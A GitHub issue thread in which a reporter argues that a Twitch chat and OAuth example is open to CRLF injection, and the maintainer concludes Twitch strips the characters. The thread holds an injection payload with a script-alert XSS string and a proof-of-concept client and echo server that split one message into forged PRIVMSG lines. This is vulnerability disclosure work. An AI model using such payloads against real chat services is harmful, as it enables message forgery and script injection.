### ISSUE TITLE
This is vulnerable to CRLF injection

### ISSUE THREAD

**Issue by joedotsh** [Marenthyu/twitchChatAndOAuthExample#1]
A specially crafted chat message could be split into multiple messages, allowing injection of forged messages.

```
Message 1 + CRLF injection\n@forged= :user!user@user.tmi.twitch.tv PRIVMSG #channel :<script>alert("Unsanitized inputs are bad");</script>
```

https://github.com/Marenthyu/twitchChatAndOAuthExample/blob/8a22c0e023209d8f1842ee6a3dafc15a3d4cf737/main.py#L47

**Comment by Marenthyu** [comment]
Please explain how this is possible on Twitch and I'll gladly sanitize it further.

**Comment by joedotsh** [comment]
I'm not too familiar with Twitch, but considering this came up in a thread related to borrowing code, I still felt it was appropriate, as we have all used likely snippets from various projects/examples in vulnerable ways. 

In the context where this would be used for the message receiver, one could assume a string of `\r`,`\n`,`\x0a`, `\x0d`, etc. may not be treated as CRLF, but instead broadcast on the websocket to all clients as a literal string (likely assuming DOM purification is handled in the client side libraries). 

I think it goes without saying that when python's `splitlines()` see's these sequences, it will treat them as line terminators.

A super rough example using your code in a slightly different manner, we can achieve this result. 

**Client**
```python
#!/usr/bin/env python3

import asyncio
import websockets
import re

def onChatMessage(message):
    for line in message.splitlines():
        ircMessage = re.match(r"^(?:@([^ ]+) )?(?:[:](\S+) )?(\S+)(?: (?!:)(.+?))?(?: [:](.+))?$", line)
        hostMatch = re.match(r"([a-z_0-9]+)!([a-z_0-9]+)@([a-z._0-9]+)", ircMessage.group(2))
        user = hostMatch.group(1) 
        usermessage = ircMessage.group(5)
        channel = ircMessage.group(4)
        print(channel + " " + user + ": " + usermessage)

async def client():
    uri = "ws://localhost:1337"
    async with websockets.connect(uri) as websocket:
        base =  "@forged= :user!user@user.tmi.twitch.tv PRIVMSG #channel "
        msg = f'{base}:Message 1 + CRLF injection\x0a{base}:Injected message 2 w/CLRF + xss injections\x0d{base}:<script>alert("Unsanitized inputs are bad");</script>'
        await websocket.send(msg)
        response = await websocket.recv()
        onChatMessage(response)
        
asyncio.get_event_loop().run_until_complete(client())
```

**Reflective Server**
```python
#!/usr/bin/env python3

import asyncio
import websockets

async def server(websocket, path):
    data = await websocket.recv()
    await websocket.send(data)
start_server = websockets.serve(server, "localhost", 1337)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()```


**Output**
```
➜ ./chatsploit.py
#channel user: Message 1 + CRLF injection
#channel user: Injected message 2 w/CLRF + xss injections
#channel user: <script>alert("Unsanitized inputs are bad");</script>
```

**Comment by Marenthyu** [comment]
Correct, in a plain socket in the way you described it, this script would indeed be vulnerable and thus the point is valid.

However, I just verified that Twitch does strip these characters from chat messages if sent explicitly.
![](https://lowee.de/WindowsTerminal_2022-03-13_00-54-53.png)
![](https://lowee.de/chrome_2022-03-13_00-57-31.png)

Thus, I conclude that it is not an issue for the project at hand.

Thank you for the explanation!
